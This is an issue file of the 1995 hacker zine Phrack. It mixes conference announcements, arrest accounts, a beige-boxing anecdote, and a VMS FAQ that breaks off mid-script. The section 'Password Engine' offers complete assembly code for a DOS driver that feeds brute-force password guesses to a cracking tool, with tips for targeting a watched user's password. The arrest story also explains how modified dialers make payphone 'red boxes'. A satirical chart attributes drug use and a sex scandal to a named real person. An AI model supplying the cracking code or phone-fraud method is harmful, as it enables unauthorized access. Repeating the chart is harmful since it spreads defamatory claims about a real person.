                     ==Phrack Magazine==

          Volume Six, Issue Forty-Seven, File 3 of 22


                       //   //  /\   //   ====
                      //   //  //\\ //   ====
                     ==== //  //  \\/   ====

                 /\   //  // \\    //  /===   ====
                //\\ //  //   //  //   \=\   ====
               //  \\/    \\ //  //   ===/  ====

                             PART I

-----BEGIN PGP SIGNED MESSAGE-----

Phrack Magazine and Computer Security Technologies proudly present:

                 The 1995 Summer Security Conference


                           "SUMMERCON"

  June 2-4 1995 @ the Downtown Clarion Hotel in Atlanta, Georgia

This is the official announcement and open invitation to the 1995 incarnation of Summercon. In the past, Summercon was an invite-only hacker gathering held annually in St. Louis, Missouri. Starting with this incarnation, Summercon is open to any and all interested parties: Hackers, Phreaks, Pirates, Virus Writers, System Administrators, Law Enforcement Officials, Neo-Hippies, Secret Agents, Teachers, Disgruntled Employees, Telco Flunkies, Journalists, New Yorkers, Programmers, Conspiracy Nuts, Musicians and Nudists.

LOCATION:

The Clarion Hotel is located in downtown Atlanta, 9 miles from Hartsfield International Airport and just a few blocks from the Peachtree Center MARTA Station.

Considering the exorbitant expenses involved with attending other conferences of this type, Rooms at Summercon are reduced to

            $65 per night for Single or Double Occupancy

  The Clarion Hotel Downtown, Courtland at 70 Houston St., NE,
                       Atlanta, GA 30303
   (404) 659-2660 or (800) 241-3828   (404) 524-5390 (fax)

No one likes to pay a hundred dollars a night. We don't expect you to have to. Spend your money on room service, drinks in the hotel bar, or on k-rad hacker t-shirts. Remember: Mention that you are attending Summercon in order to receive the discount.

DIRECTIONS

75/85 Southbound - Exit 97 (Courtland). Go 3 blocks south on Courtland then turn left on Houston (John Wesley Dobbs Ave.)

20 East - Exit 75/85 North at International. Turn Left on Courtland at Houston Ave. NE. (aka. John Wesley Dobbs Ave. NE.)

20 West - Exit 75/85 North at International. One block to Courtland and right at Houston Ave. NE. (John Wesley Dobbs Ave. NE.)

Atlanta Airport Shuttle - The Express Bus that leaves from Atlanta's International Airport will drop you off at many hotels in the downtown area, including the Clarion. The shuttle should be no more than 12 dollars. Fares may be paid at the Airport Shuttle in the Ground Transportation area of the Airport Terminal.

MARTA - The Metropolitan Atlanta Rapid Transit Authority (MARTA), is a convenient and inexpensive way to negotiate most of the Atlanta area. Take the MARTA train from the Airport to the Peach Tree Center Station. Walk three blocks down Houston to the intersection of Houston and Courtland. The MARTA fare will be roughly 2 dollars.

Taxis - The average cab fare from Atlanta's Airport to the downtown area is roughly 30 dollars.

CONFERENCE INFO

It has always been our contention that cons are for socializing. "Seekret Hacker InPh0" is never really discussed except in private circles, so the only way anyone is going to get any is to meet new people and take the initiative to start interesting conversations.

Because of this, the formal speaking portion of Summercon will be held on one day, not two or three, leaving plenty of time for people to explore the city, compare hacking techniques, or go trashing and clubbing with their heretofore unseen online companions.

The "Conference" will be held on June 3rd from roughly 11:00 am until 6:00 pm with a 1 hour lunch break from 1:00 to 2:00.

NO VIDEO TAPING WILL BE ALLOWED IN THE CONFERENCE ROOM. Audio Taping and still photography will be permitted.

CURRENT LIST OF SPEAKERS:

Robert Steele - Ex-Intelligence Agent, Founder and CEO of Open Source Solutions (a private sector intelligence firm)

       Topic: Hackers from the Intelligence Perspective

Winn Schwartau - Author of "Information Warfare" and "Terminal Compromise", Publisher of Security Insider Report, and noted security expert

       Topic: Electromagnetic Weaponry

Bob Stratton - Information Security Expert from one of America's largest Internet service providers

       Topic: The Future of TCP/IP Security

Eric Hughes - Cryptography Expert and founding member of the "Cypherpunks"

       Topic: Cryptography, Banking, and Commerce

Annaliza Savage - London-based Director/Producer

       Topic: Discussion of her documentary "Unauthorized Access"
              (Followed by a public screening of the film)

Chris Goggans - Editor of Phrack Magazine and Summercon M.C.

       Topic: introductions, incidentals and a topic which is sure
              to culminate in an international incident.

(Other Speakers May Be Added - Interested parties may contact scon@fc.net)

COSTS

Since other cons of this type have been charging from 25 to 40 dollars entry fees, we are only charging 10 dollars. Yes, that's correct, TEN (10) dollars in US currency. Money is far too scarce among the hacker community to fleece everyone for money they will probably need to eat with or pay for their hotel rooms.

WHAT TO DO IN ATLANTA:

To attempt to make everyone's stay in Atlanta more exciting, we are contacting local establishments to arrange for special discounts and/or price reductions for Summercon attendees. Information will be handed out regarding these arrangements at the conference.

Atlanta is a happening town.

Touristy Stuff                          Party Time

  The World of Coca-Cola                  Buckhead
  Underground Atlanta                     The Gold Club
  Georgia Dome (Baseball?)                (Countless Other Clubs and Bars)
  Six Flags

CONTACTING SUMMERCON SPONSORS

You can contact the Summercon sponsors by several means:

E-mail:     scon@fc.net

   WWW:     http://www.fc.net/scon.html

Snail Mail: Phrack Magazine 603 W. 13th #1A-278 Austin, TX 78701

If deemed severely urgent, you can PGP your email with the following PGP key:


See you in Atlanta!



UNAUTHORIZED ACCESS

"Unauthorized Access [is] a documentary that tells the story of the computer underground from our side, it captures the hacker world from Hamburg to Los Angeles and virtually everywhere in between." 2600 The Hacker Quarterly

Computers are becoming an integral part of our everyday existence. They are used to store and send a multitude of information, from credit reports and bank withdrawals, to personal letters and highly sensitive military documents. So how secure are our computer systems?

The computer hacker is an expert at infiltrating secured systems, such as those at AT&T, TRW, NASA or the DMV. Most computer systems that have a telephone connection have been under siege at one time or another, many without their owners' knowledge. The really good hackers can reroute the telephone systems, obtain highly sensitive corporate and government documents, download individuals' credit reports, make free phone calls globally, read private electronic mail and corporate bulletins and get away without ever leaving a trace.

So who are these hackers? Just exactly WHAT do they do and WHY do they do it? Are they really a threat? What do they DO with the information that they obtain? What are the consequences of their actions? Are hackers simply playing an intellectual game of chess or are hackers using technology to fight back and take control of a bureaucratic system that has previously appeared indestructible?

Unauthorized Access is a documentary that demystifies the hype and propaganda surrounding the computer hacker. Shot in 15 cities and 4 countries, the film hopes to expose the truths of this subculture focusing on the hackers themselves.

Unauthorized Access is a view from inside the global underground.

For a PAL (European) copy send a cheque/postal order for 15 British Pounds or $25 for NTSC (American) standard to:

Savage Productions Suite One 281 City Road London EC1V 1LA


                        ACCESS ALL AREAS
                       Hacking Conference

                      1st - 2nd July, 1995
                      (Saturday  & Sunday)
                   King's College, London, UK

-------------------------------WHAT-IT-IS---------------------------------

The first UK hacking conference, Access All Areas, is to be run in London later this year. It is aimed at hackers, phone phreaks, computer security professionals, cyberpunks, law enforcement officials, net surfers, programmers, and the computer underground.

It will be a chance for all sides of the computer world to get together, discuss major issues, learn new tricks, educate others and meet "The Enemy".

-------------------------------WHERE-IT-IS--------------------------------

Access All Areas is to be held during the first weekend of July, 1995 at King's College, London. King's College is located in central London on The Strand and is one of the premier universities in England.

-----------------------------WHAT-WILL-HAPPEN-----------------------------

There will be a large lecture theatre that will be used for talks by computer security professionals, legal experts and hackers alike. The topics under discussion will include hacking, phreaking, big brother and the secret services, biometrics, cellular telephones, pagers, magstrips, smart card technology, social engineering, Unix security risks, viruses, legal aspects and much, much more.

Technical workshops will be running throughout the conference on several topics listed above.

A video room, equipped with multiple large screen televisions, will be showing various films, documentaries and other hacker related footage.

The conference facilities will also include a 10Mbps Internet link connected to a local area network with various computers hanging off of it and with extra ports to connect your laptop to.

------------------------------REGISTRATION--------------------------------

Registration will take place on the morning of Saturday 1st July from 9:00am until 12:00 noon, when the conference will commence. Lectures and workshops will run until late Saturday night and will continue on Sunday 2nd July from 9:00am until 6:00pm.

----------------------------------COST------------------------------------

The price of admission will be 25.00 British pounds (approximately US $40.00) at the door and will include a door pass and conference programme.

-----------------------------ACCOMMODATION--------------------------------

Accommodation in university halls of residence is being offered for the duration of the conference. All prices quoted are per person, per night and include full English breakfast. (In British pounds)

                         SINGLE       TWIN
    WELLINGTON HALL       22.00       16.75

Special prices for British and Overseas university students, holding current student identification, are also available - please call King's Campus Vacation Bureau for details.

All bookings must be made directly with the university. They accept payment by cash, cheque and credit card.

To make a booking, call the following numbers...

    KING'S CAMPUS VACATION BUREAU

    Telephone : +44 (0)171 351 6011
    Fax       : +44 (0)171 352 7376

----------------------------MORE-INFORMATION------------------------------

If you would like more information about Access All Areas, including pre-registration details then please contact one of the following...

    Telephone : +44 (0)973 500202
    Fax       : +44 (0)181 224 0547
    Email     : info@phate.demon.co.uk

            D I S T R I B U T E  W I D E L Y

             *****FIRST CALL FOR PAPERS*****

                    InfoWarCon '95

           A 2 Day International Symposium
                 on Information Warfare

                  September 7-8, 1995
               Stouffer Concourse Hotel
                    Arlington, VA

                    Presented by:
         National Computer Security Association
           Winn Schwartau and Interpact, Inc.
               Robert Steele and OSS, Inc.

CONFERENCE OVERVIEW:

The Information Warfare Conference (InfoWarCon) is our third international conference dedicated to the exchange of ideas, policies, tactics, weapons, methodologies and defensive posture of Information Warfare on a local, national, and global basis.

InfoWarCon will bring together international experts from a broad range of disciplines to discuss and integrate concepts in this rapidly evolving field. Attendees will intensely interact with the speakers and presenters as well as each other to increase each other's understanding of the interrelatedness of the topics.

While there are many interpretations of Information Warfare by different groups, the current working definition we employ is:

 Information Warfare is the use of information and information
 systems as weapons in a conflict where information and
 information systems are the targets.

Information Warfare is broken down into three categories, and InfoWarCon speakers and attendees will interactively examine them all:

 Class I: Personal Privacy. "In Cyberspace You Are Guilty
 Until Proven Innocent." The mass psychology of information.
 Privacy versus stability and law enforcement.

 Class II: Industrial and Economic Espionage. Domestic and
 international ramifications and postures in a globally
 networked, competitive society.

 Class III: Global Information Warfare. Nation-state versus
 Nation-state as an alternative to conventional warfare, the
 military perspective and terrorism.

THE CONFERENCE

The conference is designed to be interactive - with extensive interaction between all participants. The preliminary contents and discussions will focus on:

Plenary sessions will accommodate all attendees, while break-out sessions will provide more intimate presentations and interactivity on topics of specific interests.

SUBMISSIONS:

Submissions for papers are now being accepted. We are looking for excellent speakers and presenters with new and novel concepts of Information Warfare. You may submit papers on the topics listed above, or on others of interest to you, your company or government.

We welcome innovative thought from the private sector, the government (civilian, military and intelligence) and the international community. Submissions must be received by May 1, 1995, and notification of acceptance will occur by June 1, 1995. Please submit 2-3 page presentation outlines to:

                    winn@infowar.com.

All submissions and the contents of InfoWarCon '95 will be in English. If you must submit a hard copy: Fax: 813.393.6361 or snail mail to: Interpact, Inc. 11511 Pine St., Seminole, FL 34642

All submissions and presentations should be unclassified, as they will become Open Source upon submission and/or acceptance.

SPONSORS:

The Information Warfare Symposium is currently choosing sponsors for various functions.

    Continental Breakfast, Day 1 and Day 2
    Morning Coffee Break, Day 1 and Day 2
    Lunch, Day 1 and Day 2
    Afternoon Coffee Break, Day 1 and Day 2
    Cocktail Party, Day 1

Each Corporate or Organizational sponsor will be included in all promotional materials and Symposium function. For more information, contact Paul Gates at the NCSA. Voice: 717.258.1816 or email: 747774.1326@Compuserve.com.

EXHIBITS:

Limited space is available for table-top displays for commercial or governmental products, services, educational or other promotion. For further information, contact Paul Gates at the National Computer Security Association. 717.258.1816

REGISTRATION:

 Payment made BEFORE July 1, 1995:

            (   )  $445.00     NCSA Member/OSS Attendee
            (   )  $545.00     All others

 Payment made AFTER July 1, 1995:

            (   )  $495.00     NCSA Members/OSS Attendees
            (   )  $595.00     All others

( ) I'M INTERESTED, but would like more information sent to the address above. Please include a free copy of your 32 page "Information Security Resource Catalog".

( ) I'd like to know more about NCSA on-site training, security audits and consulting services. Please have someone give me a call.

MAIL OR FAX TO:

             National Computer Security Association
             10 South Courthouse Avenue
             Carlisle, PA 17013
             Phone 717-258-1816 or FAX 717-243-8642
             EMAIL:       74774.1326@compuserve.com
             CompuServe:  GO NCSAFORUM

Winn Schwartau Interpact, Inc. Information Security & Warfare V:813.393.6600 F:813.393.6361 Email: Winn@Infowar.Com


Ed Cummings, also known to many in cyberspace as "Bernie S", was arrested on March 13th, 1995 for 2 misdemeanors of possession, manufacture and sale of a device to commit Telecommunications fraud charges. He is being held in Delaware County Prison in lieu of $100,000.00 Bail. His story follows.

On the evening of the 13th Bernie S. received a page from his mail drop. Some people he knew from Florida had stopped in at his mail drop thinking it was his address. They were looking to purchase several 6.5 Mhz Crystals. These crystals when used to replace the standard crystal in the RADIO SHACK Hand Telephone dialer, and with some programming, produce tones that trick pay phones into believing they have received coins. These are commonly referred to as "red boxes" and got their name from an actual red box pulled from a pay phone in the late seventies by some curious person.

Ed Cummings met these people at a local 7-11 (which 7-11?) where he was to sell the widely used electronic timing crystals for roughly $4 a piece. The purchaser only had two twenty dollar bills and Ed Cummings had no change. Ed Cummings went into the 7-11 to get some change to make the transaction. A police officer noticed a van parked in the parking lot of the 7-11 with several African Americans inside. As Ed was leaving the 7-11 he noticed fifteen police cars pulling into the parking lot of the 7-11.

Next thing he knew the police were asking him if they could 'rifle' through his car. He said no. Moments later, as he was talking to a Detective, he noticed another police officer going through his car. He asked the officer to stop. They did not. In all, the police confiscated a few hundred 6.5Mhz crystals (which he resells for roughly $4 a piece) and a large box of 100 dialers. The police told him they would get back to him, and he could have his electronics back if the contents of the bag were legal. In the contents of the seized items was one modified dialer, that a customer returned after modification explaining that it did not work, a broken red box.

The next day Ed 'Bernie S.' Cummings was over at a friend's house working on their computer when eight to ten plain clothed armed men burst into the house and ordered him and his friends to freeze. They cuffed him and took him to a holding cell (what jail?). There he was left without a blanket or jacket to sleep with in the cold cell.

That evening the Secret Service had been called in when someone figured out what the dialers and crystals would do when put together. The United States Secret Service found his home and entered it, while they were questioning him.

The next morning at his arraignment he was finally told of the charges he was being held upon. They were Two misdemeanor Charges of manufacture, Distribution and Sale of devices of Telecommunications Fraud, and Two Unlawful use of a computer charges. His bail was automatically set to $100,000.00 because Ed Cummings refused to talk with the police without his attorney present.

The Secret Service presented to the judge a 9 page inventory of what they had found in his home. On that inventory there were 14 computers, 2 printers, more boxes of BIOS chips for the systems he worked with, and EPROM burners which the Federal Agents had labeled "Cellular telephone chip reprogramming adapters". EPROMs are used in everything from Automobile computers to personal computers. They also confiscated his toolbox of screw drivers, wire clippers and other computer oriented tools he used for his consulting job.

The Judge dropped the Two unlawful use of a computer charges due to the fact that the evidence was circumstantial and the county had no actual evidence that Ed had ever used the computers in question.

As of 3/27/1995 Ed Cummings is still in Delaware County Prison awaiting his trial. His trial has not yet been scheduled and Ed will most likely not raise the One Hundred Thousand Dollars needed to be released on bail.


"Don't believe the hype." - Public Enemy, 1988

This file's purpose is to clear up any misconceptions about the recent situation that has come upon the sociopolitical group known as KoV.

As it stands now, (10:55 PM EST on 1/29/95), NO ONE has been busted for ANYTHING. We have received several tip-offs from private sources regarding a supposed "FBI investigation" of our group that is purported to be active at this very minute. However, with the exception of a few VERY suspicious incidents and coincidences, there has been NO HARD EVIDENCE thus far about ANYONE getting busted for ANYTHING. So while we are EXTREMELY concerned for the integrity of our innocence, we must stress that nothing has gone down.

Yet.

We have very good reason to believe that a few of those among us are about to be charged with various false accusations by a local university. However the current mental state of the person in charge of this charade is also in question. Therefore it would be logical to assume nothing. The conflicting tip-offs, rumors, warnings and threats that we have received make it even more difficult to get a clear picture of exactly what is going on. We have heard so many things from so many different sources, both credible and questionable, that we would be hard-pressed to give an accurate evaluation of the current state of things.

What we can say for sure, however, is that KoV officially died on Monday, January 23, 1995, along with its communications network, KoVNet. This promises to be a great loss to the open-minded and sociopolitical community as well as the free-thinkers and activists who supported us so generously. Our reasons for disbanding the group were many, but the foremost was in light of the current situation we are facing.

Consider this last obstacle our final, stalwart stand against the evils of AmeriKKKan government and its various greedy, capitalistic agencies. From the moment of KoV's conception, they have publicly sought to destroy us; to silence our questioning of authority, to oppress our free-thinking minds, and to close off our intellectual channels of communication. They have even gone so far as to stalk us in public places. 'Tis a shame indeed.

If you have any questions or if you wish to contact us for any reason, you may email sgolem@pcnet.com with the subject or header of "ATTN: KoV". I will try to post further updates of this saga to CiPNet, ThrashNet, QuantumNet, InsanityNet, ScumNet, FizzNet, NukeNet and any others I can. We would appreciate any support that other h/p, art or political groups can lend us. Until then, my friends...

-Lord Valgamon, Malicious Intent, Onslaught, Leland Gaunt & the rest of KoV


            What happens when you are caught beige boxing.

                    by Rush 2


    Yeah yeah, I'm the only one.  But here is a generally interesting
 description of everything to getting caught to arraignment.

    Well about 5 months ago i needed to set up a conference really quick..
 it was about 12:00  (never knew there was a 10:00 pm curfew in that area)
 and went to a 25 pair box at this local strip mall.  Well I was out there
 the box was already open and I was just about to start testing pairs to
 see which was connected and what wasn't.

    All of a sudden, i hear this loud screeching sound of a car coming
 to a skid from doing about 90mph.  I turned and saw that typically dirty
 squad car about to hit me.. you know the car, mud and dust on the tires
 and body, coffee and smudge marks all over the windshield.  i got on my
 bike and started to run.  Now the thing is I COULD have gotten away.. the
 pathetic excuse for a cop had run not more than 10 yards after me and
 decided that I was a threat so he pulled his handgun and yelled.  I saw
 this and thought it would be wiser to stop than get shot.

    Within 2 minutes at LEAST 10 squad cars had come to his aide.. i did
 not know i was less than a half mile from a police station and they were
 looking for a prowler in the general area.  The police did the normal,
 called me scum, asked me what i was doing, searched me until they were
 satisfied...  than picked me up and threw me in the car... the funny
 thing was they didn't see my phone until they threw me into the back seat
 and the cord fell out.. (they never saw the page of notes and 'naughty'
 material in my pocket though it was about 4 inches thick and sticking out
 that a blind man could see it.

    Well they got me to the station and pried my info out, and called my
 father... I came up with a good enough story about some made up user
 who told me to go across the street and plug in..  then I was told I
 would be dealt with in the next week...  I did not receive anything for
 three and a half months.

    Once the time came for the arraignment (for a juvenile they called it
 an intake).  I got to go to the police station, sit for about 3 hours (as
 if i thought they would be on time) until I waited for my probation
 officer. Finally she got there and we proceeded to talk.  She explained
 all of the charges and my lawyer (interesting guy) laughed, I was being
 charged with prowling (could be disputed I was on a public sidewalk and
 there in that strip mall is a 24 hr laundry mat), loitering (again that
 could be disputed), and attempted theft of services (though I NEVER even
 plugged in).

    After this was all said i spent the next hour talking with the lady
 in private.  I immediately found she had an interest in computers and was
 having a problem with her home pc.  So I easily changed the topic to my
 fascination in computers and solved her problem with her computer, and
 answered at least 50 questions about them.  In the last 10-15 minutes of
 the conversation all i could get from her were statements about how
 impressed and how intrigued she was with me.  She ended up giving me a
 look (that was hard to judge but i am staying away from this chick) that
 was either confusion or attraction, slipped me a card with her home phone
 number and name and called back in my lawyer and parents.

    Once they got back in, all that she really said was I was a great boy,
 that she would like to see me do more with my time besides computers, and
 that she was taking my sentence of 12 months formal probation with 300
 hours of community service to 3 months of informal probation with 30
 hours of community service.  That and she said bell was asking her what
 to do and she would tell them that it was a non issue since I did not
 plug in and even if I had it would not be their concern unless I had
 plugged in to the telco access part of the network interface.

    Well I have yet to receive official record of having to perform
 the community service or the probation but I called my probation officer
 yesterday and said she wasn't putting the community service into the
 punishment and it has been an equivalent amount of time to just say that
 since I haven't gotten in trouble since she will count the probation as
 already served.  Luckily she based all other needs of me on the report
 from a teacher, and with my luck she picked the one teacher, my computers
 teacher, that no matter what I did or said would lie and say I didn't.


    Thanks to erikb for publishing this, and greets to CXrank, paradox,
 dark phiber, the fat cop (who spilled his coffee and box of donuts
 coming after me) that made this all possible,  and to everyone else.


                    -rush 2
        http://www-bprc.mps.ohio-state.edu/cgi-bin/hpp/Rush_2.html


            Look for My site, unforeseen danger soon to be on a 28.8 slip
        and by the end of the summer on a 500k slip connect.

[Something found on IRC]

Danny Partridge                            Emmanuel Goldstein
(AKA Danny Bonaduce:                       (AKA Eric Corley:
a child star from                          the child-like publisher
"The Partridge Family"                     of 26oo magazine.

Hosts a boring local                       Hosts a boring local
radio program.                             radio program.

Quasi Celebrity                            Quasi Celebrity
Status among                               Status among
70's freaks                                telephone phreaks

Periods of Heavy                           Periods of Heavy
Drug Usage                                 Drug Usage

Involved in Sex                            Involved in Sex
Scandal with                               Scandal with
another man                                another man

Last name is                               Friends with Phiber
"Bonaduce"                                 Optik whose first
                                           handle was "Il Duce"

Supplements incoming                       Supplements incoming
by doing desperate                         by doing desperate
local talk shows                           local talk shows
whenever he can.                           whenever he can.


Top 10 #hack fights that would be the coolest to see.

(And no, Ophie's not in it twice just because she's a girl...)

10.) The D.C. Convention Center is Proud to Present: Hot-Oil Wrestling featuring KL & TK.

9.) Ludichrist vs. GFM, to be resolved at the next convention, or, uh, the one after that... or, uh...

8.) C-Curve and Elite Entity, "Who's who?"

7.) Ben Camp vs. Ben Sherman, "Particles of Novocain Everywhere." (Or: "I'm totally numb, let me hug you!!!")

6.) Dan Farmer and Pete Shipley: "Whips vs. Chains"

5.) Grayarea vs. Netcom "No, I want root..."

4.) WWF Wrestling with Len and |al|.

3.) Ophie vs. Voyager, "Night of the Living Dead."

2.) Okinawa vs. Gail Thackery, "The Winner Gets Okinawa's Testicle."

and the number one #hack fight is

1.) Ophie vs. all the #hack guys, "10 Bucks on the Girl"


             P A S S W O R D   E N G I N E  (for IBM PC's)
                          by Uncle Armpit
             +++++++++++++++++++++++++++++++++++++++++++++

The device driver code listed below provides a data stream of passwords. The device driver approach was used to speed up the process of cracking passwords on an incremental basis. The usual approach was to generate the passwords to a file, then read the file back, and so on. The device driver approach circumvents these file storage problems, and others, such as having enough free disk space and delays from disk i/o. This driver operates completely in memory (approx. 0.5Kb).

How practical is this?


This program would be very useful if you think you may know what strategy the user/admin uses for picking out their passwords. Without eliciting some sort of a strategy, forget it-- unless you're desperate enough!!

A "strategy" could consist of any of these possible advantages--

1) default passwords (ie: SIN, student #, birth date, phone number...)
2) the mutation of a lUSERs' known password from another system
3) viewing the mark typing in most of their password with a couple of unseen characters
4) etc...


With the sample device driver provided, passwords starting at 'aaaaaaa' and ending with 'zzzzzzz' will be generated. The length of the password string can be modified by changing the length of the password string itself (that is, the variable "number"). The range of characters in the passwords can also be changed by modifying the following two lines:

;hackdrv.sys
;.
;.
; for ending character--
        cmp byte ptr [number+si],'z'+1   ;+1 past ending char. in range

...and for starting character
        cmp byte ptr [number+si],'a'     ;starting char. in range
;
;----------------------

for instance, if you wished to generate numbers from "0000000" to "9999999"

-change the ending character to: cmp byte ptr [number+si],'9'+1

-starting character to: cmp byte ptr [number+si],'0'

and "number" variable from 'aaaaaa' to '0000000' and then recompile..


..or in the third case, if u had observed a lUSER type in most of their password, you may want to rewrite the code to limit the search. IE: limit the keys to a certain quadrant of the keyboard. Modify the code starting at "reiterate:" and ending at "inc_num endp" for this.

/'nuff of this!/

How do I get things working?

Compile the device driver "hackdrv.sys", and the second program, "modpwd.asm". Then specify the device driver inside config.sys (ie: "c:\hackdrv.sys"). The code below was compiled with the a86 compiler, v3.03. Some modifications might be needed to work with other compilers.

To use it in prgs like crackerjack, type in the following on the command line:

c:>jack -pwfile: -word:hackpwd


If you had stopped a cracker program (eg: crackerjack) and want to pick up from where you left off, run the program "modpwd.com".

This program can change HACKDRVs password through-

a) a command line argument (ie: "modpwd aabbbbe")
b) executing the program with no parameters (this method also displays the current password in memory)

                                               Happy Hacking,
                                               Uncle Armpit

;-----------------------cut here--------------------------------
;Program HACKDRV.SYS
;
        org 0h
nextdev   dd -1
attribute dw 0c000h             ;character device w/ ioctl calls
strategy  dw dev_strategy
interrupt dw dev_int
devname   db 'HACKPWD '
countr    dw offset number
number    db 'aaaaaa',0ah       ;<----six characters, lower case
numsize   equ $-number - 2
afternum:

;working space for device driver
rh_ofs dw ?
rh_seg dw ?

dev_strategy:                   ;strategy routine
        mov cs:rh_seg,es
        mov cs:rh_ofs,bx
        retf

dev_int:                        ;interrupt routine
        pushf
        push ds
        push es
        push ax
        push bx
        push cx
        push dx
        push di
        push si

        cld
        push cs
        pop ds

        mov bx,cs:rh_seg
        mov es,bx
        mov bx,cs:rh_ofs

        mov al,es:[bx]+2        ;command code from the request header
        rol al,1                ;times two = index into the word table
        mov di,offset cmdtab
        xor ah,ah
        add di,ax
        jmp word ptr[di]

cmdtab:                         ;command table
        dw init                 ;0
        dw exit3                ;1
        dw exit3                ;2
        dw ioctl_read           ;3
        dw do_read              ;4
        dw exit3                ;5
        dw exit3                ;6
        dw exit3                ;7
        dw exit3                ;8
        dw exit3                ;9
        dw exit3                ;10
        dw exit3                ;11
        dw ioctl_write          ;12
        dw exit3                ;13
        dw 5 dup (offset exit3)

ioctl_read:
        push es
        push bx

        mov si,es:[bx+10h]
        mov di,es:[bx+0eh]
        mov es,si

        push cs
        pop ds
        mov si,offset number
        xor cx,cx

get_char:
        lodsb
        stosb
        inc cl
        cmp al,0ah
        jz ioctl_rend
        jmp get_char

ioctl_rend:
        pop bx
        pop es
        mov es:[bx+012h],cx
        mov cs:countr,offset number
        jmp exit2

ioctl_write:
        push es
        push bx
        mov si,es:[bx+010h]
        mov ds,si
        mov si,es:[bx+0eh]
        mov cx,numsize+1        ;es:[bx+012h]
        push cs
        pop es
        mov di,offset number
        repe movsb
        pop es
        pop bx
        mov cs:countr,offset number
        jmp exit2

do_read:
        push es
        push bx

        push cs
        pop ds

        mov si,[countr]
        inc si                  ;word ptr [countr]
        cmp si,offset afternum
        jnz is_okay
        mov si,offset number
        call inc_num

is_okay:
        mov [countr],si
        mov di,es:[bx]+0eh
        mov ax,es:[bx]+010h
        mov cx, es:[bx]+012h
        jcxz clean_up
        mov es,ax
        repe movsb

clean_up:
        pop bx
        pop es
        jmp exit2

exit3:
        mov es:word ptr 3[bx],08103h
        jmp exit1

exit2:
        mov es:word ptr 3[bx],0100h

exit1:
        pop si
        pop di
        pop dx
        pop cx
        pop bx
        pop ax
        pop es
        pop ds
        popf
        retf
exit:

inc_num proc near
        push si
        mov si,numsize

reiterate:
        inc byte ptr [number+si]
        cmp byte ptr [number+si],'z'+1  ;+1 past ending char. in range
        jnz _exit
        mov byte ptr [number+si],'a'    ;starting char. in range
        dec si
        cmp si,-1
        jnz reiterate
        mov byte ptr [number],01ah      ;send EOF
_exit:
        pop si
        ret
inc_num endp

at_eof:                         ; the non-resident code starts here

initial proc near
        push es

        push cs
        pop ds

        push cs
        pop es

        mov si,offset number
        mov di,offset tmpnum
        cld
_again:
        lodsb
        cmp al,0ah
        jz _nomorechars
        stosb
        jmp _again

_nomorechars:
        mov si,offset msgend
        mov cx,4
        repe movsb

        mov ah,09               ;print welcome message
        mov dx,offset msg1
        int 21h

        pop es
        ret
initial endp

init:
        call initial
        mov ax,offset at_eof
        mov es:[bx]+0eh,ax
        push cs
        pop ax
        mov es:[bx]+010h,ax
        mov cs:word ptr cmdtab,offset exit3
        jmp exit2

msg1    db "Incremental Password Generator (c)1995",0ah,0dh
        db "Written by Uncle Armpit",0ah,0dh,0ah,0dh
        db "Starting at word ["
tmpnum  db 10 dup (?)
msgend  db "]",0a,0d,'$'
;END hackdrv.sys

;------------------------------cut here----------------------------------

;PROGRAM modpwd.asm
;
        org 0100h
        mov ax,03d02h
        xor cx,cx
        mov dx,offset devname
        int 21h
        jnc drvr_found

        mov ah,09
        mov dx,offset no_drvr
        int 21h
        jmp error_pass

drvr_found:
        mov bx,ax
        mov ax,04402h
        mov cx,20               ;read 20 characters
        mov dx,offset databuffr
        int 21h

        mov pass_len,al
        dec al
        mov ah,al
        and al,0fh
        mov cl,4
        shr ah,cl
        add ax,03030h
        cmp al,'9'
        jbe inrange
        add al,7
inrange:
        cmp ah,'9'
        jbe inrange1
        add ah,7
inrange1:
        mov byte ptr [num_chr],ah
        mov byte ptr [num_chr+1],al

        cld
        mov di,offset databuffr-1
        xor cx,cx
        mov cl,pass_len
        add di,cx
        mov si,offset passend
        mov cx,stringsz
        repe movsb

;check for information in command line
;else--> prompt for user input
        mov al,pass_len
        or byte ptr [0080h],0
        jz req_input
        mov cl,[0080h]
        dec cl
        mov [0081h],cl
        mov si,0081h
        mov di,offset newpass
        mov cx,20
        repe movsb
        jmp vrfy_info

req_input:
        mov ah,09
        mov dx,offset cur_pass
        int 21h

        mov ah,0a
        mov dx,offset pass_len
        int 21h

vrfy_info:
        mov ax,word ptr [pass_len]
        cmp ah,0
        jz error_pass
        dec al
        cmp ah,al
        jnz error_len

;change the current password
        xor cx,cx
        mov cl,al
        mov ah,044h
        mov al,03
        mov dx,offset newpass+1
        int 21h
        jnc success_pass

error_len:
        mov ah,09
        mov dx,offset errormsg
        int 21h

error_pass:
        mov ax,04c01h           ;abnormal termination
        int 21h

success_pass:
        mov ax,04c00h
        int 21h

devhandle dw ?
cur_pass  db 'Current password is ['
databuffr db 20 dup (?)
passend   db '] ;'
num_chr   db ' '
          db ' characters',0ah,0dh,0ah,0dh
prompt    db 'New word: ','$'
stringsz  equ $ - passend

pass_len  db 00
newpass   db 20 dup (?)
errormsg  db 'error changing password!',0ah,0dh,'$'
no_drvr   db 'Error: '
devname   db "HACKPWD ",00
          db 'device driver not loaded!',0ah,0dh,07,'$'


     -- Frequently & Rarely asked questions about VMS -- part one
    by Opticon the Disassembled - UPi

[1]

" I have a kropotkin.hlp file. What could I possibly do with it ? "

$ library /insert /help sys$help:helplib.hlb kropotkin.hlp
.
.
.
$ help kropotkin

[2]

" I have a bakunin.tlb file. What to do with it ? "

$ library /extract=(*) bakunin.tlb
.
.
.
$ dir

[3]

" I would like to have a look at prunton.dat. "

$ dump [/block=(count:x)] prunton.dat

Where "x" is the number of blocks DUMP will display.

[4]

" How can I use an external editor with mail ? "

$ mail :== mail /edit=(send,reply=extract,forward)

[5]

" How is a HELP file organized ? "

$ create example.hlp
1 EXAMPLE

THIS IS AN EXAMPLE.

2 MORE_EXAMPLES

MORE EXAMPLES.

3 EVEN_MORE_EXAMPLES

EVEN MORE EXAMPLES.
<CTRL-Z>

[6]

" How can I have a look at queues ? "

$ show queue smtp /all/full

or

$ show queue /batch/all/full

or

$ show queue /all/full

[7]

" My mail is held, for some reason, in the SMTP queue... "

Either

$ delete /entry=XXX

or

$ set entry XXX /release

in order to force VMS to release it right away.

[8]

" How do I have a look at DTE and circuits available. "

$ mc ncp show known dte

and

$ mc ncp show known circuits

You may also find of interest:

$ mc ncp show known networks

$ mc ncp show known lines

$ mc ncp show known destinations

[9]

" I need a NUA scanner for VMS. "

$ OPEN/READ VALUES SCAN.VAL
$ READ VALUES PRE
